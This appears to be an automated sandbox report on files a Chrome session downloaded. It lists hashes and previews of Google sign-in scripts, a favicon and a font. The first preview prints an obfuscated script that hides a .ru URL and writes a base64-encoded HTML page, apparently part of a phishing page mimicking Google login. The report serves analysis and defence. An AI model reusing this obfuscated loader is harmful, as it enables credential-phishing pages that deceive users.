                          Preview:<script>../* Success is not the absence of failure; it&#039;s the persistence through failure. */..if(atob("aHR0cHM6Ly8zSC52ZXJhY2lkZXAucnUvOXJRUTdwWVov") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbj
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                          Category:downloaded
                          Size (bytes):5430
                          Entropy (8bit):3.6534652184263736
                          Encrypted:false
                          SSDEEP:
                          MD5:F3418A443E7D841097C714D69EC4BCB8
                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                          Malicious:false
                          Reputation:unknown
                          URL:https://www.google.com/favicon.ico
                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
                          Category:downloaded
                          Size (bytes):52280
                          Entropy (8bit):7.995413196679271
                          Encrypted:true
                          SSDEEP:
                          MD5:F61F0D4D0F968D5BBA39A84C76277E1A
                          SHA1:AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
                          SHA-256:57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
                          SHA-512:6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
                          Malicious:false
                          Reputation:unknown
                          URL:https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
                          Preview:wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.*',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.|*(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.5*1w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e*......71.?.7.ORv.?...l...G|.P...|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....|..D.d..
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (722)
                          Category:dropped
                          Size (bytes):4237
                          Entropy (8bit):5.374090679085738
                          Encrypted:false
                          SSDEEP:
                          MD5:460E41D643185B1AB9E917891823873A
                          SHA1:A069D5DD09E1C27C234D551C85BD466250238695
                          SHA-256:3B62E1C504AB8C2444CF240A3878E2B7652CE2975B2F13867FF2A01F77350E71
                          SHA-512:4305772F1142E5F8A241677113E6543CE6E67479BC3C96C51024C2CEB76F1CBCE7BC93B31D83CE2FA45B5881DD48B18CBFFD3139B54D922AEA7E08A16956A8D2
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.Og(_.Iqa);._.k("sOXFj");.var Ru=function(){_.Ct.call(this)};_.J(Ru,_.Fu);Ru.Ca=_.Fu.Ca;Ru.prototype.aa=function(a){return a()};_.Ku(_.Hqa,Ru);._.l();._.k("oGtAuc");._.Cya=new _.Cf(_.Iqa);._.l();._.k("q0xTif");.var wza=function(a){var b=function(d){_.Io(d)&&(_.Io(d).Nc=null,_.gv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;c++)b(a[c])};_.rv=function(a,b){a&&_.Ef.hc().register(a,b)};_.sv=function(a){_.fv.call(this,a.La);var b=this,c=a.context.Aha;this.oa=c.Ir;this.qd=this.Pa=this.eb=this.Ba=null;this.Ma=a.Ga.Mc;this.Wa=a.Ga.Gpa;a=this.oa.oa.then(function(d){b.Ba=d;d=b.oa.id.v7(d,b.oa.getParams());b.eb=d.variant});c=c.A2.then(function(d){b.Pa=d});this.Ea=this.Ea.bind(this);this.Kj(_.Ki([a,c]))};_.J(_.sv,_.fv);_.sv.Ca=function(){return{context:{Aha:"FVxLkf"},Ga:{Mc:_.Pu,component:_.lv,Gpa:_.Cya}}};_.sv.prototype.aa=function(){ret
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (2041)
                          Category:dropped
                          Size (bytes):21445
                          Entropy (8bit):5.418561738568366
                          Encrypted:false
                          SSDEEP:
                          MD5:0104D1DB164E2E14AB199170E03BF1F1
                          SHA1:B954341479B3EFC1BAFE28D0E266DB25DA2BE316
                          SHA-256:5FDA9C82C1F75FC8A555C833E6D716FA662676647D891001404838CFC8013A32
                          SHA-512:4ECB853AADFCAF6E43A84E293BD549A4CFE4D005770BDE705BAAC7CD964F9CF10A215552DD97B70DDFC153FEB58B5FC6B7090241E3A272E3C1BA85D65DFF7706
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{.var fIa;._.Sz=function(){var a=fIa(_.Ie("xwAfE"),function(){return _.Ie("UUFaWc")}),b=fIa(_.Ie("xnI9P"),function(){return _.Ie("u4g7r")}),c,d,e,f;return(f=gIa)!=null?f:gIa=Object.freeze({isEnabled:function(g){return g===-1||_.pf(_.Ie("iCzhFc"),!1)?!1:a.enabled||b.enabled},environment:(c=_.Zk(_.Ie("y2FhP")))!=null?c:void 0,lT:(d=_.Zk(_.Ie("MUE6Ne")))!=null?d:void 0,Ct:(e=_.Zk(_.Ie("cfb2h")))!=null?e:void 0,kq:_.al(_.Ie("yFnxrf"),-1),K2:_.CFa(_.Ie("fPDxwd")).map(function(g){return _.al(g,0)}).filter(function(g){return g>0}),.y7:a,i7:b})};fIa=function(a,b){a=_.pf(a,!1);return{enabled:a,xB:a?_.Ld(_.il(b(),_.Tz)):hIa()}};_.Tz=function(a){this.Ha=_.u(a)};_.J(_.Tz,_.w);var hIa=function(a){return function(){return _.pd(a)}}(_.Tz);var gIa;._.k("p3hmRc");.var WIa=function(a,b,c,d){this.transport=a;this.aa=b;this.da=c;this.environment=d;this.fa=Number(Date.now()).toString(36)+Math.rando
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (673)
                          Category:downloaded
                          Size (bytes):1338
                          Entropy (8bit):5.231032845680865
                          Encrypted:false
                          SSDEEP:
                          MD5:3DD8EF493FBE1A6FD61592D6321D4C37
                          SHA1:D7F2984BEFAA0B11CBBAC5A98CFBFFF6FB957289
                          SHA-256:37D01B5D32DA496CA129EF8ACFA3B838F6165AD5C561E9EC8E8E43A62849A404
                          SHA-512:B11A8BE6F1A00BA7B18E850FFCC214823AABF7519E46C8728EF139310436C55FA8714ACC388850F951D0789E6C7CF56475A5CAB1F459376134154F91BB024827
                          Malicious:false
                          Reputation:unknown
                          URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.o-xrRUOsnJg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=iQ2mZPgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHWF9YibrbVxyqBWgCA7Xrwdn4pxw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=P6sQOc"
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("P6sQOc");.var p0a=!!(_.ei[0]>>28&1);var r0a=function(a,b,c,d,e){this.fa=a;this.Ba=b;this.oa=c;this.Da=d;this.Ea=e;this.aa=0;this.da=q0a(this)},s0a=function(a){var b={};_.Oa(a.qV(),function(e){b[e]=!0});var c=a.fV(),d=a.kV();return new r0a(a.kS(),c.aa()*1E3,a.JU(),d.aa()*1E3,b)},q0a=function(a){return Math.random()*Math.min(a.Ba*Math.pow(a.oa,a.aa),a.Da)},t0a=function(a,b){return a.aa>=a.fa?!1:b!=null?!!a.Ea[b]:!0};var u0a=function(){this.da=_.Iu(_.l0a);this.fa=_.Iu(_.j0a);var a=_.Iu(_.Z_a);this.fetch=a.fetch.bind(a)};u0a.prototype.aa=function(a,b){if(this.fa.getType(a.Yd())!==1)return _.Gn(a);var c=this.da.xX;return(c=c?s0a(c):null)&&t0a(c)?_.Aya(a,v0a(this,a,b,c)):_.Gn(a)};.var v0a=function(a,b,c,d){return c.then(function(e){return e},function(e){if(p0a)if(e instanceof _.xf){if(!e.status||!t0a(d,e.status.yc()))throw e;}else{if("function"==typeof _.Cs&&e instanceof _.Cs&
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (533)
                          Category:dropped
                          Size (bytes):9198
                          Entropy (8bit):5.398112721724972
                          Encrypted:false
                          SSDEEP:
                          MD5:4B2A8559624000298005FB792F9E9360
                          SHA1:55B076201354C5EF45237D321A2EBF8AA260D6E9
                          SHA-256:638030C69AEE78854C0143E4950464346B66BF0D27A9F1BBFAF40AB0390EF218
                          SHA-512:1814DB1E57B516525168A27E57CA21EDF323965C9262F5A9E198E7408F46A287B36885928162605761A5B6CB3C4B429DEADE349C67304B522CDEB9CF647A45A4
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.WOa=_.z("SD8Jgb",[]);._.HV=function(a,b){if(typeof b==="string")a.zc(b);else if(b instanceof _.Op&&b.ia&&b.ia===_.B)b=_.Za(b.ww()),a.empty().append(b);else if(b instanceof _.Va)b=_.Za(b),a.empty().append(b);else if(b instanceof Node)a.empty().append(b);else throw Error("qg");};_.IV=function(a){var b=_.tp(a,"[jsslot]");if(b.size()>0)return b;b=new _.rp([_.ul("span")]);_.up(b,"jsslot","");a.empty().append(b);return b};_.qTb=function(a){return a===null||typeof a==="string"&&_.aj(a)};._.k("SD8Jgb");._.NV=function(a){_.W.call(this,a.La);this.Xa=a.controller.Xa;this.Yc=a.controllers.Yc[0]||null;this.header=a.controller.header;this.nav=a.controller.nav;var b;(b=this.Aa().find("button:not([type])").el())==null||b.setAttribute("type","button")};_.J(_.NV,_.W);_.NV.Ca=function(){return{controller:{Xa:{jsname:"n7vHCb",ctor:_.Nv},header:{jsname:"tJHJj",ctor:_.Nv},nav:{jsname:"DH6Rkf",ct
                          No static file info